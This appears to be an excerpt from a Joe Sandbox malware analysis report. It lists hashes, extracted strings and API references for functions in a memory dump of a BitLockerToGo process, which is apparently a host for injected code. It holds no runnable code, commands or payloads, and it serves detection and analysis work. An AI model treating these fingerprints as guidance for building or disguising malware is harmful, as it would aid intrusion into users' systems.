                                    • Instruction ID: 1d99498da847f1daa805e94340df5e30d11fc2c268a6474fd9382a5529a0e437
                                    • Opcode Fuzzy Hash: 2ea22e46caff4318fec955fb584b43b2a5e62d7ba2c4a4037c7743daf1882aa5
                                    • Instruction Fuzzy Hash: C872D071A0C3428FC315CF28C59876ABBE1ABC5748F188E6DE8D997391D374D949CB82
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000005.00000002.1873658386.0000000002960000.00000040.00000400.00020000.00000000.sdmp, Offset: 02960000, based on PE: true
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_5_2_2960000_BitLockerToGo.jbxd
                                    Similarity
                                    • API ID:
                                    • String ID: 1=!$9:8$ESBT$efg`$2
                                    • API String ID: 0-3227402009
                                    • Opcode ID: bee0f5cf4569620e143d09ee68eb2bc3519f2ee6125f86148c3cd3acc2266dfb
                                    • Instruction ID: 4cb9bf37348acdf7b18d02c155130daac17378e605c4c035ce4ccbab12117106
                                    • Opcode Fuzzy Hash: bee0f5cf4569620e143d09ee68eb2bc3519f2ee6125f86148c3cd3acc2266dfb
                                    • Instruction Fuzzy Hash: 9E328974508B818BEB26CF39C494BA2BBE1AF0B314F4849ADD4DB97782C736E505CB54
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000005.00000002.1873658386.0000000002960000.00000040.00000400.00020000.00000000.sdmp, Offset: 02960000, based on PE: true
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_5_2_2960000_BitLockerToGo.jbxd
                                    Similarity
                                    • API ID:
                                    • String ID: -$0123456789ABCDEFXP$0123456789abcdefxp$gfff$gfff
                                    • API String ID: 0-3620105454
                                    • Opcode ID: a9e3de2409e5242ecbeb872b9d5186993d586318ce424a7bcf37a07a7e42a41e
                                    • Instruction ID: 74981fb09b784ba44aa89b371e4e5644729cc4a0ab3aa018e6c0f5392760ec15
                                    • Opcode Fuzzy Hash: a9e3de2409e5242ecbeb872b9d5186993d586318ce424a7bcf37a07a7e42a41e
                                    • Instruction Fuzzy Hash: 5DE17030A0D3928FC715CF29C49466AFBE2AFD5308F188A6DE8D987352D335D949CB52
                                    APIs
                                    • LoadLibraryExW.KERNEL32(23B121B5,00000000,00000800), ref: 02993CBA
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000005.00000002.1873658386.0000000002960000.00000040.00000400.00020000.00000000.sdmp, Offset: 02960000, based on PE: true
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_5_2_2960000_BitLockerToGo.jbxd
                                    Similarity
                                    • API ID: LibraryLoad
                                    • String ID: ~PF=
                                    • API String ID: 1029625771-944997009
                                    • Opcode ID: 469083b00fb925c969f25aff0cb67d4f22ba2970633114eb459b382f326f9df6
                                    • Instruction ID: adace18c01a9b4773f98263467540540d26f18235ce3b93e6694ccc16f8d9e79
                                    • Opcode Fuzzy Hash: 469083b00fb925c969f25aff0cb67d4f22ba2970633114eb459b382f326f9df6
                                    • Instruction Fuzzy Hash: 2E02BD70505B408BEB218F39C890BE3BBE1BF56318F54099DE4EB9B682C736A405CB65
                                    APIs
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000005.00000002.1873658386.0000000002960000.00000040.00000400.00020000.00000000.sdmp, Offset: 02960000, based on PE: true
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_5_2_2960000_BitLockerToGo.jbxd
                                    Similarity
                                    • API ID: MetricsSystem
                                    • String ID:
                                    • API String ID: 4116985748-3916222277
                                    • Opcode ID: 8bcf6f4c7f2aaee8241e2aa7151fd31c7d46249ceda2c52f77cd759313b06530
                                    • Instruction ID: 8e2e140a518a9d0f50fec46cf71167c7e4a7857b932efa0af14d0ca63cde866c
                                    • Opcode Fuzzy Hash: 8bcf6f4c7f2aaee8241e2aa7151fd31c7d46249ceda2c52f77cd759313b06530
                                    • Instruction Fuzzy Hash: 945182B4D152089FDB40EFACD985AADBBF0BF48300F118529E898E7350D735A955CF82
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000005.00000002.1873658386.0000000002960000.00000040.00000400.00020000.00000000.sdmp, Offset: 02960000, based on PE: true
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_5_2_2960000_BitLockerToGo.jbxd
                                    Similarity
                                    • API ID:
                                    • String ID: $%$LO$hw
                                    • API String ID: 0-466875633
                                    • Opcode ID: c9f3b8d745e7933f36b001eebca3932a1a7416897b4464235f9e77854573323f
                                    • Instruction ID: 9110b62a76b39fbaf7ec293db715d962f7913626e073b0c981cdfdd6ee69ebfa
                                    • Opcode Fuzzy Hash: c9f3b8d745e7933f36b001eebca3932a1a7416897b4464235f9e77854573323f
                                    • Instruction Fuzzy Hash: 793296B59083409BC711EF28D890A2EBBF5EF96744F08892CE4C98B351E739C915CB96
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000005.00000002.1873658386.0000000002960000.00000040.00000400.00020000.00000000.sdmp, Offset: 02960000, based on PE: true
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_5_2_2960000_BitLockerToGo.jbxd
                                    Similarity
                                    • API ID:
                                    • String ID: )$)$IEND
                                    • API String ID: 0-588110143
                                    • Opcode ID: 912a2740e76f288415285152ad40dffc42b55e92147c14c5a2a84e5e3bbb922b
                                    • Instruction ID: ae1d6e58f8a10b97f95febc7df5cc35859251e76c636e63a22f642f89629d1e3
                                    • Opcode Fuzzy Hash: 912a2740e76f288415285152ad40dffc42b55e92147c14c5a2a84e5e3bbb922b
                                    • Instruction Fuzzy Hash: 6DF1D3B1A08751AFD310CF28C85876ABBE1BF94314F044A2DE9A59B381D775E918CBD2
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000005.00000002.1873658386.0000000002960000.00000040.00000400.00020000.00000000.sdmp, Offset: 02960000, based on PE: true
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_5_2_2960000_BitLockerToGo.jbxd
                                    Similarity
                                    • API ID:
                                    • String ID: 4`[b$<="#$efg`
                                    • API String ID: 0-1928303999
                                    • Opcode ID: b9fab0cfb0833305d70a81002e0c571564dd9350b99668ffe439a707640320c1
                                    • Instruction ID: 86daf91d75dadd73d8242b41d57d107bad00500a63c54758ed56fedfb552562b
                                    • Opcode Fuzzy Hash: b9fab0cfb0833305d70a81002e0c571564dd9350b99668ffe439a707640320c1
                                    • Instruction Fuzzy Hash: D7C1BF795083009BD711EF98C891ABBF7F9EF86354F28491CE4D59B251E335D904CBA2
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000005.00000002.1873658386.0000000002960000.00000040.00000400.00020000.00000000.sdmp, Offset: 02960000, based on PE: true
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_5_2_2960000_BitLockerToGo.jbxd
                                    Similarity
                                    • API ID:
                                    • String ID: efg`$f
                                    • API String ID: 0-1150721270
                                    • Opcode ID: 45a43c62c4706989e79e36f262a40fabc1cdbce507a28fc38d2736b10b26f9ec
                                    • Instruction ID: 3f4ee1c02f49a4bf1441ae985cf947652d346aa966d9a7933364b85078f5633e
                                    • Opcode Fuzzy Hash: 45a43c62c4706989e79e36f262a40fabc1cdbce507a28fc38d2736b10b26f9ec
                                    • Instruction Fuzzy Hash: B522CE71A0C3419FC715CF18C8A0B2AFBE6AFC8318F598A2DE49997391D775D844CB92
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000005.00000002.1873658386.0000000002960000.00000040.00000400.00020000.00000000.sdmp, Offset: 02960000, based on PE: true
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_5_2_2960000_BitLockerToGo.jbxd
                                    Similarity
                                    • API ID:
                                    • String ID: *$e{
                                    • API String ID: 0-248662316
                                    • Opcode ID: 35831e5ae96b2c2107d385c5296cb3e73736873bc0fd939b43166f4aeec8ceb6
                                    • Instruction ID: 5704946c5c8544ecdfaa74bc11195e4213a5f1f8941c7abbd02989fad61d10fc
                                    • Opcode Fuzzy Hash: 35831e5ae96b2c2107d385c5296cb3e73736873bc0fd939b43166f4aeec8ceb6
                                    • Instruction Fuzzy Hash: D5F1DAB1908380DFD715DF68D89472FBBF6AF86354F19482CE48987292E771D844CB92
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000005.00000002.1873658386.0000000002960000.00000040.00000400.00020000.00000000.sdmp, Offset: 02960000, based on PE: true
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_5_2_2960000_BitLockerToGo.jbxd
                                    Similarity
                                    • API ID:
                                    • String ID: D$r]Z[
                                    • API String ID: 0-150308939
                                    • Opcode ID: 79060900de88ef41ffca0845cd8ffd658082450dd8fbf894b894a696cd6a6e18
                                    • Instruction ID: 31f69b94ad3f9d566e26fb44b9f63e764139985a75b855a4c76a2530de874a81
                                    • Opcode Fuzzy Hash: 79060900de88ef41ffca0845cd8ffd658082450dd8fbf894b894a696cd6a6e18
                                    • Instruction Fuzzy Hash: 1ED166B4908381CBD720DF24C891BABB7F5FF85359F14895CE9C98B290E774A805CB92
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000005.00000002.1873658386.0000000002960000.00000040.00000400.00020000.00000000.sdmp, Offset: 02960000, based on PE: true
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_5_2_2960000_BitLockerToGo.jbxd
                                    Similarity
                                    • API ID:
                                    • String ID: Inf$NaN
                                    • API String ID: 0-3500518849
                                    • Opcode ID: eb5242ea5fa22ec3e5983f290c2b5c2ac169b65e4324423bc3710cf13133b912
                                    • Instruction ID: 968d7df4176d286e135071059b63f235821004b1018f9c5878373935c3b3b291
                                    • Opcode Fuzzy Hash: eb5242ea5fa22ec3e5983f290c2b5c2ac169b65e4324423bc3710cf13133b912
                                    • Instruction Fuzzy Hash: 56D1D372A083129BC704CF28C98466AB7E5EFC8B54F158E6DE89997390E735DC05CBC6
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000005.00000002.1873658386.0000000002960000.00000040.00000400.00020000.00000000.sdmp, Offset: 02960000, based on PE: true
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_5_2_2960000_BitLockerToGo.jbxd
                                    Similarity
                                    • API ID:
                                    • String ID: EZ[X$P
                                    • API String ID: 0-2027203311
                                    • Opcode ID: db8a22122b4b7ce0ac41aec432471088fd88e344d729ec155e33b59254673b07
                                    • Instruction ID: 30429b5e98b6c5a2254bc879e51d6e960384fab08c5535d932963f26b5df62fd
                                    • Opcode Fuzzy Hash: db8a22122b4b7ce0ac41aec432471088fd88e344d729ec155e33b59254673b07
                                    • Instruction Fuzzy Hash: 79D1C67290C3648FD726CE1894A072FB6E5FB85758F168A2CE8A5AB380CB71DC05C7D1
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000005.00000002.1873658386.0000000002960000.00000040.00000400.00020000.00000000.sdmp, Offset: 02960000, based on PE: true
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_5_2_2960000_BitLockerToGo.jbxd
                                    Similarity
                                    • API ID: InitializeThunk
                                    • String ID: efg`$yjUF
                                    • API String ID: 2994545307-2681823704
                                    • Opcode ID: 0e65b7fc847253beec43c1cc9b52d7cad8d3c4af52b4e95ea9172ad93b6c5c1c
                                    • Instruction ID: 9888b3c3bc54ec71a6df859d61e9ab1c95b2b1b8847455b4e8df8d8e126ae536
                                    • Opcode Fuzzy Hash: 0e65b7fc847253beec43c1cc9b52d7cad8d3c4af52b4e95ea9172ad93b6c5c1c
                                    • Instruction Fuzzy Hash: 84B1F071A083018BD718EF28D880B3BB7E6EF85354F18496EE5D59B391E331D904CBA2
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000005.00000002.1873658386.0000000002960000.00000040.00000400.00020000.00000000.sdmp, Offset: 02960000, based on PE: true
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_5_2_2960000_BitLockerToGo.jbxd
                                    Similarity
                                    • API ID:
                                    • String ID: 4`[b$u'd!
                                    • API String ID: 0-965411109
                                    • Opcode ID: c14e73a2f5ab58e54052b28dde2da555e20d255200bf01ef4c044ccaee256fd5
                                    • Instruction ID: 9f1d513d2b5439f7aa9599236306976ff871ce74e04ee297c24c9e1dea1aed81
                                    • Opcode Fuzzy Hash: c14e73a2f5ab58e54052b28dde2da555e20d255200bf01ef4c044ccaee256fd5
                                    • Instruction Fuzzy Hash: AEB1AFB55083809BD730DF24C851BABB7F5FF8A319F04495CEA9A8B291E7359800CB66
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000005.00000002.1873658386.0000000002960000.00000040.00000400.00020000.00000000.sdmp, Offset: 02960000, based on PE: true
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_5_2_2960000_BitLockerToGo.jbxd
                                    Similarity
                                    • API ID:
                                    • String ID: 0$8
                                    • API String ID: 0-46163386
                                    • Opcode ID: f25904b02f137daec9c723274841f0ec173c55a4e84c701f66f9b17f97ea6ac8
                                    • Instruction ID: 13d5526b4560bdf63a5d7cb83f80a21b0990ffc5b675e4a3390e6a1730d89cde
                                    • Opcode Fuzzy Hash: f25904b02f137daec9c723274841f0ec173c55a4e84c701f66f9b17f97ea6ac8
                                    • Instruction Fuzzy Hash: 56D14231A0C381EFD3058F28C844BAFBBE1AB8A354F048D6DF98987291D375D958CB52
                                    Strings
                                    • 000102030405060708090A0B0C0D0E0F101112131415161718191A1B1C1D1E1F202122232425262728292A2B2C2D2E2F303132333435363738393A3B3C3D3E3F404142434445464748494A4B4C4D4E4F505152535455565758595A5B5C5D5E5F606162636465666768696A6B6C6D6E6F707172737475767778797A7B7C7D7E7F8081, xrefs: 02996ED7
                                    • U, xrefs: 02996E0E
                                    Memory Dump Source
                                    • Source File: 00000005.00000002.1873658386.0000000002960000.00000040.00000400.00020000.00000000.sdmp, Offset: 02960000, based on PE: true
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_5_2_2960000_BitLockerToGo.jbxd
                                    Similarity
                                    • API ID:
                                    • String ID: 000102030405060708090A0B0C0D0E0F101112131415161718191A1B1C1D1E1F202122232425262728292A2B2C2D2E2F303132333435363738393A3B3C3D3E3F404142434445464748494A4B4C4D4E4F505152535455565758595A5B5C5D5E5F606162636465666768696A6B6C6D6E6F707172737475767778797A7B7C7D7E7F8081$U
                                    • API String ID: 0-3552884152
                                    • Opcode ID: 070116941b6cecb723c00a70f5aa2d5a5ac0bb4257f8f7c9ab0e3bae474ecb62
                                    • Instruction ID: 105f9e34e7143e1c15343d3573515e187b61bc83dc3ba4ff14a08d5b70f247d6
                                    • Opcode Fuzzy Hash: 070116941b6cecb723c00a70f5aa2d5a5ac0bb4257f8f7c9ab0e3bae474ecb62
                                    • Instruction Fuzzy Hash: D171233664D6908BDB29893C982037ABE9A4FC2234F2D8F6DE5F28B3D1D266C411C351
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000005.00000002.1873658386.0000000002960000.00000040.00000400.00020000.00000000.sdmp, Offset: 02960000, based on PE: true
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_5_2_2960000_BitLockerToGo.jbxd
                                    Similarity
                                    • API ID:
                                    • String ID: 4`[b$EZ[X
                                    • API String ID: 0-3834568995
                                    • Opcode ID: 763d180905bb05605fc1896acef61b741db4f7e970c3fa62707bbfd3df558641
                                    • Instruction ID: 257e7363db9863eed35c8042beb4756b5d4f7fec3451e8c0a26a9ed4e4a865ed
                                    • Opcode Fuzzy Hash: 763d180905bb05605fc1896acef61b741db4f7e970c3fa62707bbfd3df558641
                                    • Instruction Fuzzy Hash: 2F51C475A083009BC7159A18C8A0B3EB7E6FBC5754F198A2CE9E9A7291D731AC11CBD1
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000005.00000002.1873658386.0000000002960000.00000040.00000400.00020000.00000000.sdmp, Offset: 02960000, based on PE: true
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_5_2_2960000_BitLockerToGo.jbxd
                                    Similarity
                                    • API ID: InitializeThunk
                                    • String ID: ;:54$@
                                    • API String ID: 2994545307-1464668931
                                    • Opcode ID: c8cc28729e23d3380e99dc7ae1c36d664426d2cf8cb28133d1ff6257923c320f
                                    • Instruction ID: 043d5fefc391cdf828fad03e5e5a2a423b708bce793d3e42eba4ef86ee0e5492
                                    • Opcode Fuzzy Hash: c8cc28729e23d3380e99dc7ae1c36d664426d2cf8cb28133d1ff6257923c320f
                                    • Instruction Fuzzy Hash: D3317AB29083049BC314DF55D890A2BF7FAFFD9318F14992DE98897290D335D918CBA6
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000005.00000002.1873658386.0000000002960000.00000040.00000400.00020000.00000000.sdmp, Offset: 02960000, based on PE: true
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_5_2_2960000_BitLockerToGo.jbxd
                                    Similarity
                                    • API ID:
                                    • String ID: +=
                                    • API String ID: 0-1874961287
                                    • Opcode ID: aa2a7c8380a254f8e541b1458d86475e00c1d42fd475734ddfa7ca1f8cdb3020
                                    • Instruction ID: a23f7342c99999c7e0bf9db3d3fb0fe8eaeba46b4d3deefca962c4e324e03251
                                    • Opcode Fuzzy Hash: aa2a7c8380a254f8e541b1458d86475e00c1d42fd475734ddfa7ca1f8cdb3020
                                    • Instruction Fuzzy Hash: BF32AAB5908381DBD705DF64D884B6BBBF9AF86344F08182DE48A93252E771D944CB92
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000005.00000002.1873658386.0000000002960000.00000040.00000400.00020000.00000000.sdmp, Offset: 02960000, based on PE: true
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_5_2_2960000_BitLockerToGo.jbxd
                                    Similarity
                                    • API ID:
                                    • String ID: %1.17g
                                    • API String ID: 0-1551345525
                                    • Opcode ID: fb87c732143987eeacb99c96603093b6270f44e55fbc56557e819c1966b1c314
                                    • Instruction ID: 6d4e87b07cde16f1addf3c3b7327f610f239643d543bee361b5bd0fa13951817
                                    • Opcode Fuzzy Hash: fb87c732143987eeacb99c96603093b6270f44e55fbc56557e819c1966b1c314
                                    • Instruction Fuzzy Hash: 2B1208B1A08382CBE7258E58C588336BBE6AFE5318F9FC56DD8898B351E771D805C741
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000005.00000002.1873658386.0000000002960000.00000040.00000400.00020000.00000000.sdmp, Offset: 02960000, based on PE: true
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_5_2_2960000_BitLockerToGo.jbxd
                                    Similarity
                                    • API ID:
                                    • String ID: efg`
                                    • API String ID: 0-115929991
                                    • Opcode ID: c837d114269f878c4b7701f5f80ff8beeec28f0a94f4fd2ea32f2130881d6587
                                    • Instruction ID: 9554eccdbeb39aed2e10c266daeb016e52c252195c0fb94fd7b1847577b29fac
                                    • Opcode Fuzzy Hash: c837d114269f878c4b7701f5f80ff8beeec28f0a94f4fd2ea32f2130881d6587
                                    • Instruction Fuzzy Hash: 74F1DD75A0D202CFD705DF28E990B2AB3E6FB89304F09887DE98587290D734ED65CB61
                                    APIs
                                    • CoCreateInstance.OLE32(029AEB80,00000000,00000001,029AEB70), ref: 02987219
                                    Memory Dump Source
                                    • Source File: 00000005.00000002.1873658386.0000000002960000.00000040.00000400.00020000.00000000.sdmp, Offset: 02960000, based on PE: true
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_5_2_2960000_BitLockerToGo.jbxd
                                    Similarity
                                    • API ID: CreateInstance
                                    • String ID:
                                    • API String ID: 542301482-0
                                    • Opcode ID: b16f3c2434ab3c55ffe25b5f85ee1ec1765ad7f7542b6695ce74aa3678537ded
                                    • Instruction ID: 0100f3fdcf98d312f6bec7a11c7aabb0fd9402e922b76ae65a16dead055d34e4
                                    • Opcode Fuzzy Hash: b16f3c2434ab3c55ffe25b5f85ee1ec1765ad7f7542b6695ce74aa3678537ded
                                    • Instruction Fuzzy Hash: B351B4B56403049BDB20ABA4CC96FB7B3B9EF85358F184958F986CB290F375D804C762
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000005.00000002.1873658386.0000000002960000.00000040.00000400.00020000.00000000.sdmp, Offset: 02960000, based on PE: true
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_5_2_2960000_BitLockerToGo.jbxd
                                    Similarity
                                    • API ID:
                                    • String ID: efg`
                                    • API String ID: 0-115929991
                                    • Opcode ID: 3ad0736524e6333e88dec4537aee3b43a639328e1b6d4258deb59c9705132b9e
                                    • Instruction ID: 333ed49725877ffea0b9c38ff22262e71fb67e0165ada41f3ad061aa79136d85
                                    • Opcode Fuzzy Hash: 3ad0736524e6333e88dec4537aee3b43a639328e1b6d4258deb59c9705132b9e
                                    • Instruction Fuzzy Hash: 68B124B590C3418FC325DF68C890A2ABBE1FB85304F988D6DE4E58B351D334D844CBA2
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000005.00000002.1873658386.0000000002960000.00000040.00000400.00020000.00000000.sdmp, Offset: 02960000, based on PE: true
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_5_2_2960000_BitLockerToGo.jbxd
                                    Similarity
                                    • API ID:
                                    • String ID: ;:54
                                    • API String ID: 0-2887251705
                                    • Opcode ID: acb61ffebfa9b4ed0cf5591659c9e8b33f1ec81826b4121082cd071fdc8334ac
                                    • Instruction ID: 97db95680ef461ab245a5aea383e7a2c72a92c0f24e191e6f3c616330eafb365
                                    • Opcode Fuzzy Hash: acb61ffebfa9b4ed0cf5591659c9e8b33f1ec81826b4121082cd071fdc8334ac
                                    • Instruction Fuzzy Hash: A081AD752093019BC725DF68D8B0A2BB7F9FFA9748F05891CE985CB251E731E810CB92
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000005.00000002.1873658386.0000000002960000.00000040.00000400.00020000.00000000.sdmp, Offset: 02960000, based on PE: true
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_5_2_2960000_BitLockerToGo.jbxd
                                    Similarity
                                    • API ID:
                                    • String ID: ,
                                    • API String ID: 0-3772416878
                                    • Opcode ID: 8a6fb73d91190a473f48f88cc53f6b340235e558d81ddececf3063defe079300
                                    • Instruction ID: 40e54390f537a75a8566068a0e5eb4a7f827c52455874129d242d92b26a0a6b8
                                    • Opcode Fuzzy Hash: 8a6fb73d91190a473f48f88cc53f6b340235e558d81ddececf3063defe079300
                                    • Instruction Fuzzy Hash: 6DB15A711083859FC321DF28C98462BFBE1AFA9608F444E2DF5D997342D635E918CBA7
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000005.00000002.1873658386.0000000002960000.00000040.00000400.00020000.00000000.sdmp, Offset: 02960000, based on PE: true
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_5_2_2960000_BitLockerToGo.jbxd
                                    Similarity
                                    • API ID:
                                    • String ID: efg`
                                    • API String ID: 0-115929991
                                    • Opcode ID: ac947206b399d14585fa249cd34e7601d71850e41691f3762f5bc1328daff131
                                    • Instruction ID: f6d5d86482530c8e3f39675441d156fd4e07f391af470f298dd20f6bd9533591
                                    • Opcode Fuzzy Hash: ac947206b399d14585fa249cd34e7601d71850e41691f3762f5bc1328daff131
                                    • Instruction Fuzzy Hash: D071F376B083019FD311DE55C8A0B2AB7EAFBC4324F9A8A1DE5D68B291D731D814CBD1
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000005.00000002.1873658386.0000000002960000.00000040.00000400.00020000.00000000.sdmp, Offset: 02960000, based on PE: true
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_5_2_2960000_BitLockerToGo.jbxd
                                    Similarity
                                    • API ID:
                                    • String ID: 2>
                                    • API String ID: 0-1841847077
                                    • Opcode ID: 015e1cfa62c3148b4b214355796a1fc8091c1c6813bbe247b21b2f6043a90986
                                    • Instruction ID: aeb2c1fb796aa20259c224272f33e601e42ecbdbb986a91a1449444fb62ed4f5
                                    • Opcode Fuzzy Hash: 015e1cfa62c3148b4b214355796a1fc8091c1c6813bbe247b21b2f6043a90986
                                    • Instruction Fuzzy Hash: 1161027440C380AAD340DB94D984A1FFBE6AF86749F948C2DF8C897222D375D858DB67
                                    Strings
                                    • 0123456789ABCDEFGHIJKLMNOPQRSTUVWXYZ, xrefs: 02996BF3
                                    Memory Dump Source
                                    • Source File: 00000005.00000002.1873658386.0000000002960000.00000040.00000400.00020000.00000000.sdmp, Offset: 02960000, based on PE: true
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_5_2_2960000_BitLockerToGo.jbxd
                                    Similarity
                                    • API ID:
                                    • String ID: 0123456789ABCDEFGHIJKLMNOPQRSTUVWXYZ
                                    • API String ID: 0-442858466
                                    • Opcode ID: ea38027a698e821c909a7d3d776a4b8a4f8659f8e0a97a3e9e1ca41a2ba3088e
                                    • Instruction ID: d3bf7aa0b68701e7dd77fbd5c7e530c8ad0a2b83915bfc72bd09669007356b35
                                    • Opcode Fuzzy Hash: ea38027a698e821c909a7d3d776a4b8a4f8659f8e0a97a3e9e1ca41a2ba3088e
                                    • Instruction Fuzzy Hash: CC510B33A5E5908ADF214D3C4C112B46B5F5FD2374B2D8BAAE9B18B3D5D6268812C391
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000005.00000002.1873658386.0000000002960000.00000040.00000400.00020000.00000000.sdmp, Offset: 02960000, based on PE: true
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_5_2_2960000_BitLockerToGo.jbxd
                                    Similarity
                                    • API ID:
                                    • String ID: efg`
                                    • API String ID: 0-115929991
                                    • Opcode ID: bf45739d9102c0537886d733220b4e993e6018e2a45e88c5362768bf2b7017a4
                                    • Instruction ID: da089ac90f5df50bcab223c29cc263439208a4746dcd9e7468ed46b87eef78ff
                                    • Opcode Fuzzy Hash: bf45739d9102c0537886d733220b4e993e6018e2a45e88c5362768bf2b7017a4
                                    • Instruction Fuzzy Hash: BC51CF756093409BC724DF58D9A4A2EFBFAEFC9748F04982CE4C997241D771D810CBA2
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000005.00000002.1873658386.0000000002960000.00000040.00000400.00020000.00000000.sdmp, Offset: 02960000, based on PE: true
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_5_2_2960000_BitLockerToGo.jbxd
                                    Similarity
                                    • API ID:
                                    • String ID: ]K
                                    • API String ID: 0-61035251
                                    • Opcode ID: f4b8f55c5c215558af9654e5396e6c45ce218ffd36e0ed623c57802382c5079b
                                    • Instruction ID: e1e32fec8c7ed6f2c46ae1515cba8ec412df8ee57e021064ce4f464066246824
                                    • Opcode Fuzzy Hash: f4b8f55c5c215558af9654e5396e6c45ce218ffd36e0ed623c57802382c5079b
                                    • Instruction Fuzzy Hash: 87518B31A1C240CFC3459F28D99462ABBF2EB8A305F8A8C6DE4C6D7240D735D960CB52
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000005.00000002.1873658386.0000000002960000.00000040.00000400.00020000.00000000.sdmp, Offset: 02960000, based on PE: true
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_5_2_2960000_BitLockerToGo.jbxd
                                    Similarity
                                    • API ID:
                                    • String ID: ;:54
                                    • API String ID: 0-2887251705
                                    • Opcode ID: 60b97f5606442c5ad958daa99b8ca68c0e678d3ed68941cacd34c01d22395012
                                    • Instruction ID: 8f26c382b7bcf0e06dd008b19d0801d2519ea7b48957166a964bae8545b28f34
                                    • Opcode Fuzzy Hash: 60b97f5606442c5ad958daa99b8ca68c0e678d3ed68941cacd34c01d22395012
                                    • Instruction Fuzzy Hash: 0741BD74608300ABE7259F54D9A0B2FF7FAEF85714F24882CF5899B281D331D850CBA2
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000005.00000002.1873658386.0000000002960000.00000040.00000400.00020000.00000000.sdmp, Offset: 02960000, based on PE: true
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_5_2_2960000_BitLockerToGo.jbxd
                                    Similarity
                                    • API ID:
                                    • String ID: ;:54
                                    • API String ID: 0-2887251705
                                    • Opcode ID: cc8099ac3c204bfc2373c29a21c5c3c61d6e07b98e0c84a1a6a493f186430406
                                    • Instruction ID: c1e7c207a5928cca6abee79973339388cc45649bf80c1d6ea7d1b02a4027057a
                                    • Opcode Fuzzy Hash: cc8099ac3c204bfc2373c29a21c5c3c61d6e07b98e0c84a1a6a493f186430406
                                    • Instruction Fuzzy Hash: 2A418C74608300ABD7559E54D9A0B2BF7FAEF85714F24881CF5C99B291D331D810CBA6
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000005.00000002.1873658386.0000000002960000.00000040.00000400.00020000.00000000.sdmp, Offset: 02960000, based on PE: true
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_5_2_2960000_BitLockerToGo.jbxd
                                    Similarity
                                    • API ID:
                                    • String ID: yfg
                                    • API String ID: 0-2416863859
                                    • Opcode ID: 5d5d4a49fce154d983ad05d6f049afa41da509ee9ad15731e5b7ca2c39ceeacb
                                    • Instruction ID: c67d3ed09514fdb0d2c804254ae45838f35873e75b299c6cc3d2ea43f6d533ea
                                    • Opcode Fuzzy Hash: 5d5d4a49fce154d983ad05d6f049afa41da509ee9ad15731e5b7ca2c39ceeacb
                                    • Instruction Fuzzy Hash: 161146B1919380AFD341DF25D594A2FBBF9AB86388F986C2CF5C897215D330C450CB56
                                    Memory Dump Source
                                    • Source File: 00000005.00000002.1873658386.0000000002960000.00000040.00000400.00020000.00000000.sdmp, Offset: 02960000, based on PE: true
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_5_2_2960000_BitLockerToGo.jbxd
                                    Similarity
                                    • API ID:
                                    • String ID:
                                    • API String ID:
